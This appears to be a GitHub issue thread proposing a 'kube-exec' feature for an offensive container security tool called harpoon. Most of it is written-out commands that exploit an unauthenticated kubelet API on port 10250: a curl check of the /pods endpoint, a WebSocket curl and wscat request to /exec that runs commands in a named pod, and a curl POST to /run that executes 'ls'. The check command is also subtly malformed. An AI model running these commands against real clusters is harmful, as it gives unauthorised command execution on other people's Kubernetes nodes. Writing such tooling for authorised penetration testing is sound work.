Add check for kublet exec capabilities

[corysabol]

harpoon kube-exec -h https://<node-ip | node-domain> [-p 10250] [-e command]

If -e is given then if the preliminary checks pass, harpoon will try to exploit the mis-configuration. This attack only works if you can route to the node api. So, you either have to be on the same network, or it happens to be publicly routable.

Check (verify/come up with a better check)

[[ '${curl --insecure "https://<node>:10250/pods" 2>1 | head -c 2}' != '{"' ]] && echo Match

Execute command

curl --insecure -v -H "Upgrade: WebSocket" -H "Connection: Upgrade" -H "X-Stream-Protocol-Version: v2.channel.k8s.io" -H "X-Stream-Protocol-Version: channel.k8s.io" -X POST "https://<node>:10250/exec/default/redis-master-57fc67768d-klfw6/master?command=echo&command=hi&input=1&output=1&tty=1"

Stream results

wscat -c "https://<node>:10250/exec/default/redis-master-57fc67768d-klfw6/master?command=echo&command=hi&input=1&output=1&tty=1" --no-check

[corysabol]

As it turns out we don't actually need to do the second step. We can just make a websockets request to the endpoint from the get go and have command execution.

[corysabol]

[corysabol]

Easier way: curl --insecure -s https://127.0.0.1:10250/run/default/kublet-name-here/nginx/ -d "cm d=ls"